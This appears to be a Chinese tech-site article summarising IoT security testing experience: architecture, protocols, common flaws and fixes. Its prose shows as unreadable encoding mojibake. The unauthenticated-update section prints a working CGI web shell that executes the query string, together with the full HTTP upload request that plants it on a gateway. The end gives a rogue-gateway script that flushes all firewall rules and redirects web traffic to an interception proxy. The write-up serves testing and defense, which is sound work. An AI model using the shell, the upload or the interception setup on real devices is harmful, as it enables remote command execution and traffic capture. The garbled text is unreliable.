Äú¿ÉÒÔ¾èÖú£¬Ö§³ÖÎÒÃǵĹ«ÒæÊÂÒµ¡£

1Ôª 10Ôª 50Ôª





ÈÏÖ¤Â룺  ÑéÖ¤Âë,¿´²»Çå³þ?Çëµã»÷Ë¢ÐÂÑéÖ¤Âë ±ØÌî



  ÇóÖª ÎÄÕ ÎÄ¿â Lib ÊÓÆµ iPerson ¿Î³Ì ÈÏÖ¤ ×Éѯ ¹¤¾ß ½²×ù Model Center   Code  
»áÔ±   
   
 
     
   
 ¶©ÔÄ
  ¾èÖú
IoT: ÎïÁªÍø°²È«²âÊÔ¾­Ñé×ܽá
 
 
  1381  次浏览      28
2020-4-3
 
±à¼­ÍƼö:
±¾ÆªÎÄÕÂÖ÷Òª½éÉÜÁËÎïÁªÍø½â¾ö·½°¸µÄÎÊÌâºÍÌôÕ½£¬ÎïÁªÍøÌåϵ½á¹¹,ÎïÁªÍøÖг£¼ûµÄ©¶´µÈÏà¹Ø¡£
±¾ÎÄÀ´×ÔÓÚÍøÂ磬ÓÉ»ðÁú¹ûÈí¼þAnna±à¼­ÍƼö¡£

ǰÑÔ

½ñÄêÔçЩʱºò£¬ÎÒ²ÎÓëÁËÐí¶à¹ØÓÚÎïÁªÍø½â¾ö·½°¸µÄ°²È«²âÊÔ¡£Ö÷ҪĿ±êÊÇÕÒ³öÌåϵ½á¹¹ºÍ½â¾ö·½°¸ÖеÄ©¶´¡£ÔÚÕâÆªÎÄÕÂÖУ¬ÎÒ½«ÌÖÂÛһЩÓëÎïÁªÍø½â¾ö·½°¸µÄÎÊÌâºÍÌôÕ½¡£

ʲôÊÇÎïÁªÍø£¿

ÔÚÄãѧϰÓйØIPv6µÄʱºò£¬ÄãµÄÀÏʦ»òÐí˵¹ý£¬ÓÐÒ»ÌìÔÚÄãµÄ·¿×Óÿ¸öÉ豸¶¼»áÓÐÒ»¸öIP¡£ÎïÁªÍø»ù±¾ÉϾÍÊÇ´¦ÀíÿÌìµÄÊÂÎñ£¬²¢°ÑËüÃÇÁ¬½Óµ½»¥ÁªÍøÉÏ¡£Ò»Ð©³£¼ûµÄÎïÁªÍøÉ豸£ºÈçµÆ¹â£¬´°Á±£¬¿Õµ÷¡£Ò²ÓÐÏñ±ùÏäÕâÑùµÄ²»Ì«³£¼ûµÄÉ豸£¬ÉõÖÁÒ»¸öÎÀÉú¼ä£¿ £¨Êµ¼ÊÓ¦Óã©

ÎïÁªÍøµÄ¶¨ÒåÊÇ£º¡°Ìá³öÁË»¥ÁªÍøµÄ·¢Õ¹£¬ÈÕ³£ÎïÆ·ÓÐÍøÂçÁ¬½Ó£¬ÔÊÐí£¬·¢ËͺͽÓÊÕÊý¾Ý¡£¡±¡£

ÎïÁªÍøÌåϵ½á¹¹

ͨ³£ÓÐÕâÎå¸ö²¿·Ö£º

Ö´ÐÐÆ÷£ºÍ¨¹ýÎïÀí¹ý³Ì¿ØÖÆÊÂÎÈç¿Õµ÷»ú×飬ÃÅËø£¬´°Á±£¬

Íø¹Ø£ºÓÃÓÚÊÕ¼¯´«¸ÐÆ÷ÐÅÏ¢ºÍ¿ØÖÆÖÐÐÄ

´«¸ÐÆ÷£ºÓÃÓÚ¼ì²â»·¾³£¬ÀýÈç¹â£¬Ô˶¯£¬Î¶ȣ¬Êª¶È£¬Ë®/µçÁ¿£¬

ÔÆ£ºWeb½çÃæ»òAPIÍйÜÓÃÓÚÊÕ¼¯Êý¾ÝµÄÔÆ¶ËwebÓ¦ÓúʹóÐÍÊý¾Ý¼¯·ÖÎö¡£Ò»°ãÀ´Ëµ£¬¾ÍÊÇÓÃÀ´×öÐÅÏ¢ÓëÆäËû·½×ÊÔ´¹²Ïíʱ£¬

ÒÆ¶¯£¨app£©£ºÒƶ¯É豸´ó¶àʹÓõģ¬ÔÚÉ豸ÉϵÄÓ¦ÓóÌÐò£¬ÒÔʵÏÖÊÖ»ú¶Ë¿ØÖÆIoT»·¾³À´½øÐл¥¶¯

ÎïÁªÍø»·¾³±¾ÉíµÄ¿ØÖÆ´«¸ÐÆ÷ºÍÖ´ÐÐÆ÷ͨ³£Ê¹ÓÃÕâЩÎÞÏßЭÒ飨»¹Óиü¶àµÄ£©£º

Wifi

Zwave

ZigBee

Bluetooth

RF433

ÿ¸öЭÒé¶¼ÓÐÆäÓÅȱµã£¬Ò²ÓкܶàµÄÏÞÖÆ¡£µ±Ì¸µ½Ñ¡ÔñÄÄÖÖЭÒéʱ£¬×î´óµÄÎÊÌâÊǼæÈÝÐÔ¡£ÏÂÃæµÄ±í¸ñÏÔʾÁËЭÒéÖ®¼äµÄ¿ìËÙ¶ÔÕÕ£º

Ö÷ÒªµÄÇý¶¯³ÌÐòʹÓÃÌØ¶¨µÄЭÒé¡£ÀýÈçrf433ÒѾ­´ó·¶Î§Ê¹Ó㬵«²»¾ßÓÐÍø×´ÍøÂçºÍĬÈϵݲȫ»úÖÆ¡£ÕâÒâζ×Å£¬Èç¹ûÄãÈç¹ûÏëÒª°²È«ÐÔ£¬Äã¾Í²»µÃ²»Äóö×Ô¼ºµÄЭÒ飬ÕâÒâζ×ÅÄãµÄÓû§½«Ê¹ÓÃÏֳɵĴ«¸ÐÆ÷»òÉ豸¡£ZigBeeºÍZwaveÔںܴó³Ì¶ÈÉ϶¼ÊÇÒ»ÑùµÄ¡£ËûÁ©Ö®¼äµÄÖ÷񻂿±ðÊÇÔÚÉ豸µÄͨÐÅ·¶Î§¡£

Äã¿ÉÒÔ´ÓZigBee°²È«¼¼Êõ°×ƤÊéÖÐÁ˽â¸ü¶à.

ÍþвʸÁ¿

Èκΰ²È«ÆÀ¹ÀÄã¶¼ÐèÒªÁ˽âÄãµÄµÐÈËÊÇË­£¬ËûÃÇ»áÈçºÎ¹¥»÷ϵͳ²¢ÀÄÓÃʹÓÃËüÃÇ¡£µ±ÎÒ×öÍþвÒýµ¼µÄʱºòÎÒÈÏΪÉ豸°üº¬ÔÚ»·¾³ÖеÄÐÅÏ¢£¬ÕâЩÇý¶¯Æ÷¶¼ÔÚʲôµØ·½£¬¶¼ÓпÉÄܹ¹³ÉʲôÑù·çÏÕ¡£Ò»¸öÎïÁªÍøÉ豸±»ºÚ¿ÉÄÜÊDZ»ÓÃÀ´Õë¶ÔÎïÁªÍø»·¾³»ò½ö½öÊDZä³ÉÒ»¸ö½©Ê¬Íø±»ÓÃÀ´¹¥»÷Íâ²¿ÍøÂ磨»òÁ½ÕßµÄ×éºÏ£©¡£ÄãÓ¦¸ÃÆÀ¹Àʲô¿ÉÒÔÓ°ÏìÖ´ÐÐÆ÷£¬ÒÔ¼°ÈçºÎÈ·¶¨´«¸ÐÆ÷µÄÖµ¿ÉÄÜ»áÓ°Ïì»·¾³¡£Òª×öµ½ÕâÒ»µã£¬Äã±ØÐëºÜÁ˽âÎïÁªÍøÉú̬ϵͳµÄ¹¤×÷·½Ê½£¬Ê²Ã´ÀàÐ͵ÄÉ豸¿ÉÄܻᱻʹÓã¬ÒÔ¼°Ó°Ïì¿ÉÄÜ»áÈçºÎÀ©´ó¡£

ÎïÁªÍøÖг£¼ûµÄ©¶´

δ¾­Éí·ÝÑéÖ¤µÄ¸üлúÖÆ

SQL / JSON×¢Èë

Éè¼ÆÂß¼­

¹ýÓÚÐÅÈÎ

δ¾­Éí·ÝÑéÖ¤µÄ¸üлúÖÆ

¸üÐÂÈí¼þ°üÓкܶ಻ͬµÄ·½·¨¡£ÓÐЩÈËÓÃÔÚLinuxϵͳÖд«Í³µÄÈí¼þ°ü¹ÜÀíÆ÷£¬Ê¹ÓýÏÉٵĴ«Í³ÊֶΣ¬Èç¿ÉÖ´ÐгÌÐò£¬¿ÉÔËÐÐÓÚÍ¬Ò»ÍøÂçÉϵļÆËã»ú£¬À´´ÓÔÆ»·¾³µ¹ÍƸüС£ÕâЩ¸üеĻúÖÆ×î´óµÄÎÊÌâÊÇ£¬ËûÃDz»Ê¹Óð²È«µÄÊÖ¶ÎÀ´ÌṩÈí¼þ°ü¡£ÀýÈçʹÓõ¥Ò»µÄ¿ÉÖ´ÐÐÎļþµÄ»úÖÆ£¬·ÃÎÊÒ»¸öÒþ²ØµÄAPIÓÃÓÚÔÚÍø¹ØÌæ»»Îļþ¡£ÄãÐèÒª×öµÄÊÇÉÏ´«CGIÎļþÌæ»»ÏÖÓÐÎļþ¡£ÔÚÕâÖÖÌØ¶¨µÄÇé¿öϵÄÍø¹ØÊÇbashµÄCGIÔËÐУ¬ËùÒÔ¾ÍÉÏ´«ÁË×Ô¼ºµÄshell£º

#!/bin/sh
echo -e "Content-type: text/html\r\n\r\n"
echo "blaat"
#echo "$QUERY_STRING"
CMD="$QUERY_STRING"
test2=$( echo $CMD | sed 's|[\]||g' | sed 's|%20| |g')
$test2

ÇëÇó£º

POST http://192.168.1.98:8181/fileupload.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=------7cf2a327f01ae
User-Agent: REDACTED
Host: 192.168.1.98:8181
Content-length: 482
Pragma: no-cache

--------7cf2a327f01ae
Content-Disposition: form-data; name="auth"

11366899
--------7cf2a327f01ae
Content-Disposition: form-data; name="type"

w
--------7cf2a327f01ae
Content-Disposition: form-data; name="file"; filename="C:\REDACTED CONFIGURATOR\output\login.cgi"
#!/bin/sh

echo -e "Content-type: text/html\r\n\r\n"

echo "blaat"
#echo "$QUERY_STRING"
CMD="$QUERY_STRING"
test2=$( echo $CMD | sed 's|[\]||g' | sed 's|%20| |g')
$test2
--------7cf2a327f01ae

 

 

ÄãÓ¦¸ÃÄܲ³ö½ÓÏÂÀ´»á·¢Éúʲô£º

ÎҵĽ¨ÒéÊÇÀûÓÃÏÖÓеĽâ¾ö·½°¸£¬Èç¸üаü¹ÜÀíÆ÷£¬Èç¹ûÄã±ØÐëÍÆ³ö×Ô¼ºµÄ¸üаü£¬ÇëÔÚ°²×°²¿Êð֮ǰÑéÖ¤Ëü¡£

SQL/NoSQL injection

SQL×¢ÈëÒѾ­ÊÇÒ»¸ö´æÔںܳ¤Ê±¼äµÄ©¶´£¬µ±È»×¢Èë©¶´µÄ²úÉúÊÇÒòΪ³ÌÐò¿ª·¢¹ý³ÌÖв»×¢Òâ¹æ·¶ÊéдsqlÓï¾äºÍ¶ÔÌØÊâ×Ö·û½øÐйýÂË,µ¼Ö¿ͻ§¶Ë¿ÉÒÔͨ¹ýÈ«¾Ö±äÁ¿POSTºÍGETÌύһЩsqlÓï¾äÕý³£Ö´ÐС£ ÎÒÃÇ¿ÉÒÔ¿´µ½ºÜ¶àµÄ½â¾ö·½°¸£¬ºÜ¶à¿ª·¢É̲¢²»ÈÏΪÕâÊÇNoSQLÊý¾Ý¿âµÄÎÊÌâ»òÖ»ÊDz»ÖªµÀÕâÊÇÒ»¸öÎÊÌâ¡£ÔÚÕâÀÎҵĽ¨ÒéÊÇÒ»¶¨Òª×öÊʵ±µÄÊäÈëÑéÖ¤ºÍ¹ýÂË¡£ÕâÀïûÓа¸Àý·ÖÎö£¬µ«¿ÉÒÔ¿´¿´ÕâÆªÎÄÕ websecurify.

Éè¼ÆÂß¼­ºÍ¹ýÓÚÐÅÈÎ

ÓÉÓÚûÓпÉÓõIJο¼¼Ü¹¹£¬ÎÒÃÇ¿´µ½¹ýºÜ¶àµÄ¼Ü¹¹£¬ËäÈ»¿ò¼ÜÄÜʹÊÂÇé±äµÃ¸üÈÝÒ×£¬µ«Ëü¿ÉÄÜ´æÔںܴóµÄ·çÏÕÍþв£¬Ò»¸öµ¥Ò»µÄ×é¼þ¿ÉÄܱ»ÆÆ»µ¡£´ËÍ⣬ÎÒÃÇ¿´µ½¿ª·¢ÉÌÈÏΪͨÐÅÖд«Í³Óû§ÊäÈëÊDz»»áÔì³ÉÍþвµÄ¡£ÔÚÒ»¸öÕâÑùµÄʵÀýÖУ¬ÎÒÃÇ×¢Òâµ½£¬µ±À¹½ØÍø¹ØºÍÔÆÖ®¼äµÄͨÐÅʱ£¬Ã»ÓдÓÍø¹Ø±êʶ·û£¨ÎÒÃÇ¿ÉÒÔºÜÈÝÒ×µØÃ¶¾Ù£©µÄÉí·ÝÑéÖ¤¡£Õâµ¼ÖÂÁËÎÒÃÇ¿ÉÒÔ×¢Èë»ñÈ¡ÆäËûÓû§µÄÐÅÏ¢¡£ÆäËûһЩʵÀý°üÀ¨£º

ÒÆ¶¯Ó¦ÓóÌÐòÖ±½ÓµÇ¼µ½Êý¾Ý¿â£¨ËùÓÐÉ豸ʹÓÃÏàͬµÄÃÜÂ룩

±¾µØÍøÂçͨÐŲ»¼ÓÃÜ

ÏûϢûÓÐÇ©Ãû»ò½øÐмÓÃÜ

Ò×±©Á¦Ã¶¾Ù»ò²»¿É³·ÏúÐÅÏ¢£¨Èç³öÉúºÍÃû³ÆÎª×¼£©µÄʹÓÃ×÷ΪAPIÃÜÔ¿À´Ê¶±ðÓû§µÄÍø¹Ø

ͨ¹ýĬĬÎÞÎŵݲȫÐÔ

ÄÚ²¿¿ª·¢µÄ¼ÓÃÜËã·¨

ÎÒÔÚÕâÀïµÄ½¨Ò飺

½ÓÊն˵ÄÐÅÏ¢Êʵ±±àÂë´¦Àí¶ñÒâÐÅÏ¢£¬ÕâÒâζ×ſͻ§»ú²»Ó¦µ±Îª·þÎñÆ÷ºÍ¿Í»§»úÌṩÃ÷ÎÄÐÅÏ¢¡£Ò»°ãʹÓÃÉóºËºÍÑéÖ¤¿ò¼Ü¡£

Èç¹ûÉ豸ÔÚÍøÂçÖÐÍйܣ¬²»ÒªÖ¸ÍûÈκÎÊäÈëÊÇÖµµÃÐÅÀµ¡£

ÔÚËùÓÐͨÐÅÖÐʹÓúÏÊʵļÓÃÜ£¨https£©Èç¹ûÖ¤ÊéÊÇÎÞЧµÄÔò²»¿ª·Å

APIÃÜÔ¿Ï൱ÆÕ±é£¬ÒÔÈ·¶¨Ò»¸öÌØ¶¨µÄÍø¹Ø¡£ÒòΪ¸Ã±êʶ·ûµÄ·þÎñÆ÷×÷ΪÈÏÖ¤ÁîÅÆ£¬ÔòÐèҪȷ±£¸Ãʶ±ð·ûÊÇʹÓÃÃÜÂ밲ȫRNGËæ»úÉú³ÉµÄ¡£Ò»°ã½¨ÒéʹÓÃ128루32¸ö×Ö·û£©¡£

¼´Ê¹ÊÇ×îÖªÃûµÄÃÜÂëѧ¼ÒÒ²²»Äܱ£Ö¤×Ô¼ºËã·¨µÄ°Ù·Ö°Ù°²È«¡£

ºÜ¶àʱºòÓû§Ï£ÍûʹÓÃ×Ô¼ºµÄÊÖ»úÔÚ¼ÒÀïÔ¶³Ì¿ØÖÆËûÃǵķþÎñ¡£ÀýÈç´ò¿ª¿Õµ÷»ò´ò¿ªÃÅ¡£Õâ¾Í»áÒý·¢Ò»¸öÎÊÌ⣬ÄãµÄÍø¹ØÍ¨³£Î»ÓÚ·ÓÉÆ÷ºóÃæ£¬¶ø²»ÊÇÖ±½Ó´ÓInternet·ÃÎÊ¡£ÓÐЩ½â¾ö·½°¸²»ÐèҪʹÓö˿Úת·¢£¬µ«Õ⻹ÐèÒªÒ»¸ö¶¯Ì¬µÄDNS½â¾ö·½°¸£¬ÐèÒªÓû§ÅäÖá£

Ò»°ã¹«Ë¾×öµÄÊÇÒÆ¶¯Ó¦ÓóÌÐò½«Ö¸Áî·¢Ë͵½Ôƶˣ¬È»ºóÍø¹Ø´ÓÔÆ¶Ë»ñȡָÁî¡£

½áÂÛ

ÈËÃÇ×ÜÏë×ŰÑÈκζ«Î÷¶¼½»¸ø»¥ÁªÍø£¬µ«ÍùÍù»á·¢ÉúÑÏÖØµÄ°²È«´íÎó¡£´ó¶àÊý´íÎóÊÇÓÉÓÚ°²È«Ä¿±ê²»Ã÷È·£¬È±·¦¾­ÑéºÍÒâʶ¡£ÎÒÃDZØÐë²ÉÈ¡°²È«µÄÎïÁªÍø²ßÂÔ£¬¶ø²»ÊÇÆÚÍûËûÃÇÀ´¸øÎÒÃǰ²È«¡£

ÎïÁªÍø°²È«µÄ½â¾ö·½°¸²Î¿¼£º

OWASP Internet of Things (IoT) Project

·ÖÏí¸ö½Å±¾£¬Í¨¹ý´úÀí×öÒ»¸ö´ÓÎïÁªÍøÍø¹Øµ½»¥ÁªÍøµÄÀ¹½Ø¡£¿ÉÒÔÓÃÓÚ°²È«²âÊÔ£º

#!/bin/sh
echo "Interface with internet connectivity: "
read iInf
echo "Secondary interface with rogue device: "
read wInf
echo "Stopping network manager ..."
service network-manager stop
echo "Stopping dnsmasq ..."
service dnsmasq stop
echo "Bringing down wireless interface ..."
ifconfig $wInf down
echo "Configuring wireless interface ..."
ifconfig $wInf 192.168.1.1 netmask 255.255.255.0
echo "Starting dnsmasq as DHCP server ..."
dnsmasq --no-hosts --interface $wInf --except-interface=lo --listen-address=192.168.1.1 --dhcp-range=192.168.1.50,192.168.1.60,60m --dhcp-option=option:router,192.168.1.1 --dhcp-lease-max=25 --pid-file=/var/run/nm-dnsmasq-wlan.pid
echo "Stopping firewall and allowing everyone ..."
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
echo "Enabling NAT ..."
iptables -t nat -A POSTROUTING -o $iInf -j MASQUERADE
echo "Enabling IP forwarding ..."
echo 1 > /proc/sys/net/ipv4/ip_forward
echo "Gateway setup is complete"
iptables -t nat -A PREROUTING -i $wInf -p tcp --dport 80 -j REDIRECT --to-ports 8080
iptables -t nat -A PREROUTING -i $wInf -p tcp --dport 443 -j REDIRECT --to-port 8080
   
1381 ´Îä¯ÀÀ       28
????

HTTP????
nginx??????
SD-WAN???
5G?????
 
????

??????????
IPv6???????
??????????
???????
????

????????
????????
???????????????
??????????
×îл¼Æ»®
DeepSeekÔÚÈí¼þ²âÊÔÓ¦ÓÃʵ¼ù 4-12[ÔÚÏß]
DeepSeek´óÄ£ÐÍÓ¦Óÿª·¢Êµ¼ù 4-19[ÔÚÏß]
UAF¼Ü¹¹ÌåϵÓëʵ¼ù 4-11[±±¾©]
AIÖÇÄÜ»¯Èí¼þ²âÊÔ·½·¨Óëʵ¼ù 5-23[ÉϺ£]
»ùÓÚ UML ºÍEA½øÐзÖÎöÉè¼Æ 4-26[±±¾©]
ÒµÎñ¼Ü¹¹Éè¼ÆÓ뽨ģ 4-18[±±¾©]
 
×îÐÂÎÄÕÂ
ÔÆÔ­Éú¼Ü¹¹¸ÅÊö
K8S¸ß¿ÉÓü¯Èº¼Ü¹¹ÊµÏÖ
ÈÝÆ÷ÔÆ¹ÜÀíÖ®K8S¼¯Èº¸ÅÊö
k8s-ÕûÌå¸ÅÊöºÍ¼Ü¹¹
Ê®·ÖÖÓѧ»áÓÃdocker²¿Êð΢·þÎñ
×îпγÌ
ÔÆ¼ÆË㡢΢·þÎñÓë·Ö²¼Ê½¼Ü¹¹
Æóҵ˽ÓÐÔÆÔ­ÀíÓë¹¹½¨
»ùÓÚKubernetesµÄDevOpsʵ¼ù
ÔÆÆ½Ì¨¼Ü¹¹ÓëÓ¦Ó㨰¢ÀïÔÆ£©
Docker²¿Êð±»²âϵͳÓë×Ô¶¯»¯¿ò¼Üʵ¼ù
³É¹¦°¸Àý
±±¾© ÔÆÆ½Ì¨Óë΢·þÎñ¼Ü¹¹Éè¼Æ
ͨÓù«Ë¾GE DockerÔ­ÀíÓëʵ¼ùÅàѵ
ij¾ü¹¤Ñо¿µ¥Î» MDA£¨Ä£ÐÍÇý¶¯¼Ü¹¹£©
ÖªÃûÏû·Ñ½ðÈÚ¹«Ë¾ ÁìÓòÇý¶¯Éè¼Æ
ÉîÛÚijÆû³µÆóÒµ Ä£ÐÍÇý¶¯µÄ·ÖÎöÉè¼Æ